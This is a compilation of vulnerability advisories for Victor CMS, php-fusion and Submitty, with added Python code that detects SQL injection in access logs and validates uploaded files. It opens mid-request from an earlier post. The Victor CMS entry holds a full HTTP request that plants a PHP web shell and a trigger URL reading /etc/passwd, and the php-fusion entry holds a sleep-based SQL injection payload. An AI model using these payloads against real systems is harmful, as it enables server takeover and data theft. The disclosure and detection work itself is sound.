Content-Disposition: form-data; name="cfg[app_custom_short_date_format]"

d M Y
-----------------------------224716807133186052992861925563
Content-Disposition: form-data; name="cfg[app_custom_logn_date_format]"

d M Y H:i
-----------------------------224716807133186052992861925563--
-
Victor CMS 1.0 - Authenticated Arbitrary File Upload
# Exploit Title: Victor CMS 1.0 - Authenticated Arbitrary File Upload
# Google Dork: N/A
# Date: 2020-05-19
# Exploit Author: Kishan Lal Choudhary
# Vendor Homepage: https://github.com/VictorAlagwu/CMSsite
# Software Link: https://github.com/VictorAlagwu/CMSsite/archive/master.zip
# Version: 1.0
# Tested on: Windows 10

Description: The GET parameter '/admin/users.php?source=add_user' is vulnerable to Arbitrary File Uploads

POST /admin/users.php?source=add_user HTTP/1.1
Host: localhost
Content-Length: 1049
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryrMPNq33u6rCpEFhB
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://localhost/admin/users.php?source=add_user
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en;q=0.9,en-US;q=0.8,fr;q=0.7
Cookie: PHPSESSID=cjpan858fghefnjse7qv1j3v72
Connection: close

------WebKitFormBoundaryrMPNq33u6rCpEFhB
Content-Disposition: form-data; name="user_name"

test
------WebKitFormBoundaryrMPNq33u6rCpEFhB
Content-Disposition: form-data; name="user_firstname"

test
------WebKitFormBoundaryrMPNq33u6rCpEFhB
Content-Disposition: form-data; name="user_lastname"

test
------WebKitFormBoundaryrMPNq33u6rCpEFhB
Content-Disposition: form-data; name="user_image"; filename="exp.php"
Content-Type: application/octet-stream

<?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; }?>
------WebKitFormBoundaryrMPNq33u6rCpEFhB
Content-Disposition: form-data; name="user_role"

Admin
------WebKitFormBoundaryrMPNq33u6rCpEFhB
Content-Disposition: form-data; name="user_email"

[email protected]
------WebKitFormBoundaryrMPNq33u6rCpEFhB
Content-Disposition: form-data; name="user_password"

test@1234
------WebKitFormBoundaryrMPNq33u6rCpEFhB
Content-Disposition: form-data; name="create_user"

Add User
------WebKitFormBoundaryrMPNq33u6rCpEFhB--

The shell can be triggered by visiting http://localhost/img/exp.php?cmd=cat%20/etc/passwd
-
php-fusion 9.03.50 - 'ctype' SQL Injection
# Exploit Title: php-fusion 9.03.50 - 'ctype' SQL Injection
# Exploit Author: SunCSR (Sun* Cyber Security Research - ThienNV)
# Date: 2020-05-19
# Vendor Homepage: https://www.php-fusion.co.uk/
# Software Link: https://www.php-fusion.co.uk/php_fusion_9_downloads.php
# Version: 9.03.50
# Tested On: Windows 10 + XAMPP 7.4.5

### Describe the bug
I've identified an SQL injection vulnerability in php-fusion 9.03.50 that affects the endpoint /php-fusion/administration/comments.php and can be exploited via the ctype param.

### To Reproduce
Steps to reproduce the behavior:
1. Log in as admin
2. Go to Content Admin -> Comments
3. Filter comments

### POC:
Send the following HTTP request (with sleep=3s):

GET /php-fusion/administration/comments.php?aid=fee32dbfde52e8ad&ctype=(select(0)from(select(sleep(3)))v)/*'%2b(select(0)from(select(sleep(3)))v)%2b'%22%2b(select(0)from(select(sleep(3)))v)%2b%22*/ HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,vi-VN;q=0.8,vi;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close

Result: The server sleeps for 3+3+3=9 seconds

### Impact
An attacker can manipulate the SQL statements that are sent to the MySQL database and inject malicious SQL statements. The attacker is able to change the logic of SQL statements executed against the database or extract sensitive information.

### Reference
https://github.com/php-fusion/PHP-Fusion/issues/2327
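The two SQL injection posts above (Victor CMS 'cat_id' and php-fusion 'ctype') use different techniques, a UNION-based read and a stacked sleep() time-based probe, and both show up in ordinary web server access logs. Below is an added detection example written here for this page, not code from either advisory or project; the log lines are constructed, and the signatures, decoding loop and field names are my own choices.

```python
import re
from urllib.parse import parse_qsl, unquote_plus, urlsplit

# Constructed access-log lines (not taken from either advisory); the query
# strings reproduce the payload shapes the two posts describe.
SAMPLE_LOG = """\
10.0.0.5 - - [19/May/2020:10:01:02 +0000] "GET /category.php?cat_id=7 HTTP/1.1" 200 5120
10.0.0.9 - - [19/May/2020:10:01:05 +0000] "GET /category.php?cat_id=-1+UNION+SELECT+1,2,VERSION(),DATABASE(),5,6,7,8,9,10+-- HTTP/1.1" 200 5311
10.0.0.9 - - [19/May/2020:10:02:11 +0000] "GET /php-fusion/administration/comments.php?aid=fee32dbfde52e8ad&ctype=(select(0)from(select(sleep(3)))v)/*'%2b(select(0)from(select(sleep(3)))v)%2b'%22%2b(select(0)from(select(sleep(3)))v)%2b%22*/ HTTP/1.1" 200 2201
10.0.0.5 - - [19/May/2020:10:03:00 +0000] "GET /php-fusion/administration/comments.php?aid=fee32dbfde52e8ad&ctype=news HTTP/1.1" 200 2201
"""

# Combined-log-format prefix: client, timestamp, method and request target.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Two signatures matching the techniques used in the advisories: a UNION-based
# read (cat_id) and a time-based blind probe built from sleep() (ctype).
SQLI_SIGNATURES = {
    "union_select": re.compile(r"\bunion\b.{0,60}?\bselect\b", re.I | re.S),
    "time_based": re.compile(r"\b(?:sleep|benchmark)\s*\(", re.I),
}


def fully_decode(value, rounds=3):
    """Undo percent-encoding repeatedly so double-encoded payloads are caught too."""
    for _ in range(rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value


def find_sqli(log_text):
    """Return one finding per request parameter whose decoded value matches a signature."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        parts = urlsplit(m["target"])
        for name, value in parse_qsl(parts.query, keep_blank_values=True):
            hits = [sig for sig, rx in SQLI_SIGNATURES.items() if rx.search(fully_decode(value))]
            if hits:
                findings.append({"ip": m["ip"], "path": parts.path, "param": name, "signatures": hits})
    return findings
```

Matching after full decoding is what catches the ctype payload, whose quotes and plus signs arrive as %22 and %2b; a raw-string match on the log line would miss variants that encode the keyword itself.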
-
Submitty 20.04.01 - Persistent Cross-Site Scripting
# Exploit Title: Submitty 20.04.01 - Persistent Cross-Site Scripting
# Date: 2020-05-15
# Exploit Author: humblelad
# Vendor Homepage: http://submitty.org/
# Software Link: https://github.com/Submitty/Submitty/releases
# Version: 20.04.01
# Tested on: macOS Catalina
# CVE : CVE-2020-12882

Description: Submitty through 20.04.01 allows XSS via upload of an SVG document, as demonstrated by an attack by a Student against a Teaching Fellow. This vulnerability can potentially enable any student to take over the account of a TA if they open the attachment, as the cookie gets exposed.

1. Log in as a student, via student:student
2. Go here: http://localhost:1501/s20/tutorial/gradeable/01_simple_python (as an example)
3. In the new submission, upload the malicious .svg file with any XSS payload.
4. Log in as TA and open the same for grading. The XSS gets triggered, alerting the cookies.
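Both the Victor CMS 'user_image' upload (a .php body accepted as an image) and the Submitty SVG upload (script inside an XML image) come down to the server trusting the submitted file as-is. The following is an added hardening example written for this page, not code from either project; the extension allow-list, magic-byte table, forbidden SVG element and attribute sets, and the validate_upload/svg_is_safe names are my own assumptions about what such a check would look like.

```python
import re
import xml.etree.ElementTree as ET

# Accepted raster formats: extension -> magic-byte prefixes the body must start with.
IMAGE_MAGIC = {
    "png": [b"\x89PNG\r\n\x1a\n"],
    "jpg": [b"\xff\xd8\xff"],
    "jpeg": [b"\xff\xd8\xff"],
    "gif": [b"GIF87a", b"GIF89a"],
}
# SVG elements that execute script or embed another document (assumed policy).
FORBIDDEN_ELEMENTS = {"script", "foreignobject", "iframe", "embed", "object"}
SCRIPT_URL = re.compile(r"^\s*(?:javascript|data|vbscript)\s*:", re.I)


def svg_is_safe(data):
    """Reject SVG bodies carrying script, event handlers, embedded documents or DTDs."""
    if re.search(rb"<!(?:DOCTYPE|ENTITY)", data, re.I):
        return False, "DOCTYPE/ENTITY declarations not allowed"
    try:
        root = ET.fromstring(data)
    except ET.ParseError as exc:
        return False, f"malformed XML: {exc}"
    for el in root.iter():
        local = el.tag.rsplit("}", 1)[-1].lower()  # strip the XML namespace
        if local in FORBIDDEN_ELEMENTS:
            return False, f"forbidden element <{local}>"
        for attr, value in el.attrib.items():
            name = attr.rsplit("}", 1)[-1].lower()  # catches xlink:href as well
            if name.startswith("on") or (name == "href" and SCRIPT_URL.match(value)):
                return False, f"forbidden attribute {name}"
    return True, "ok"


def validate_upload(filename, data):
    """Return (accepted, reason) for a file submitted as an avatar or attachment."""
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    if ext == "svg":
        return svg_is_safe(data)
    if ext not in IMAGE_MAGIC:
        return False, f"extension '.{ext}' not allowed"  # rejects exp.php outright
    if not any(data.startswith(magic) for magic in IMAGE_MAGIC[ext]):
        return False, "body does not match the declared image type"
    return True, "ok"
```

Serving accepted SVGs with Content-Disposition: attachment or from a separate origin, as well as storing uploads under a server-chosen name outside the web root, limits the impact if a check like this is bypassed.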